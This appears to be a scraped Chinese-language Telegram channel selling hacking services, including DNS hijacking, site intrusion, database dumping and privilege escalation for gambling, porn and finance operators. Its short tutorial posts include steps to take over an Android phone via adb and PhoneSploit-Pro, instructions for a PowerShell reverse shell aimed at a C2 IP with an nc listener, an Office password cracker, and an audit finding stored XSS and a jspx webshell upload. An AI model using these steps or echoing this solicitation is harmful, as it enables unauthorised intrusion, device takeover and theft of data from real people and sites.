黑客渗透 金融劫持 BC域名跳转
17.3K subscribers
1.81K photos
19 videos
2 files
163 links
金融股民渗透国内app,海外网站app,入侵后台,脱裤数据库, dns劫持 服务器进入等等
破解网站app软件技术等等 黑客技术咨询
@hacker_HouZiM
Download Telegram
DNS流量转流量持持跳转运营商持域名跳转!
适合以下这几种行业!
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1
hook的作用
增强代码的可扩展性:Hook技术允许开发者在不修改原始代码的情况下,增加或修改功能,使得代码更加灵活和可扩展。

减少代码的侵入性:使用hook可以在不改变原始代码的前提下增加新功能,这减少了对原始代码的侵入,使得添加的功能更容易被管理和维护。

便于调试和问题定位:利用hook技术可以在函数执行前后插入调试信息,帮助开发者更好地理解程序执行流程和定位问题源头。
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1👍1
1、开启开发者模式(选项);

2、启用USB调试功能;

3、连接电脑,使用adb devices和adb tcpip 5555命令对手机进行初始化状态设置;

Android手机非首次连接设置
1、将手机与主机电脑连接到同一个WiFi网络中;

2、运行PhoneSploit-Pro并选择“Connect a device”,输入目标的IP地址并通过WiFi与其连接即可;
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
2👍1
在使用该工具之前,我们需要在目标设备PC上执行powerreverse.ps1文件。

接下来,修改powerreverse.ps1中热的LHOST和LPORT参数:

$LHOST = "你的C2 IP" $LPORT = 端口号(不需要使用双引号或单引号括起来)
启动一个Netcat监听器,或你自己在VPS或C2上部署的监听器:

$ nc -l -p <port you chose>
2👍1
Advanced Office Password Recovery是一款比较常用的office密码破解工具,它不仅能快速破解word密码,而且excel和ppt文件同样也能快速被破解。另外,不论是打开密码,还是编辑密码,它也都能破解,这样就能更加快速地得到原文件了。
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
2
sheet加密了,需要点击“移除文档所有密码”,才能解除shee码保护!
Excel作为日常办公的三大必备软件,在工作中起到很大的作用。对于一些隐私或者机密性的Office文件,我们会采取加密措施。
最头疼的恐怕是把文件密码给忘记了,但是忘记密码也不要张,用个专业的Ofice密码破解工具AdvancedOfficePasswordRecovery(以下简称“AOPR”),什么密码都可以找回来
2
pom.xml:审计maven项目首先应该查看pom.xm,通过查看此文件可以知道项目用了哪些组件及组件版本,这样可以快速查看组件对应的版本是否有漏洞。

观察到项目使用了log4j 且版本为1.2.17,此版本存在反序列化漏洞CVE-2019-17571(经过分析,不存在此漏洞,因为本项目未使用产生此漏洞的类即SocketNode类)。
还使用了druid 1.0.1 组件,可以找一些未授权接口(经过测试未发现此组件产生的未授权)。
mybatis 3.2.7 组件存在反序列化漏洞CVE-2020-26945(经过分析,不存在此漏洞,因为此项目未开启mybatis二级缓存功能)。
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
👍31
开头已经分析未发现全局的XSS过滤器,所以直接注册账号进行登录,见框就插入XSS payload。

​ 在问答功能下的我要提问功能处发现存储型XSS。
3
此处只有标题有XSS而内容无XSS,找到对应的入口进行分析原因,questionsService.addQuestions()为添加问答方法,追踪此方法

QuestionsController-->QuestionsService-->QuestionsServiceImpl-->QuestionsDao-->QuestionsDaoImpl-->QuestionsMapper

根据追踪过程分析未做字符过滤就直接保存到数据库中。并且标题和内容都保存数据库中。
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1
直接找到源代码进行分析,源码在\src\main\webapp\WEB-INF\lib\inxedu-jar.jar包中。

此处的fileType即为前端传入的文件类型后缀,分析代码可知,此处只过滤了jsp文件其他文件可随意上传,可以上传html文件造成XSS漏洞,由于此项目使用tomcat,所以可以上传jspx文件getshell。
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
2
最终的会生成:csv文件,路径CodeQLpy-master\out\result

可以看到结果还是很清晰的

Source:漏洞关键字

SourceFunction:漏洞所在的方法名

SourcePath:漏洞所在文件地址
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1👍1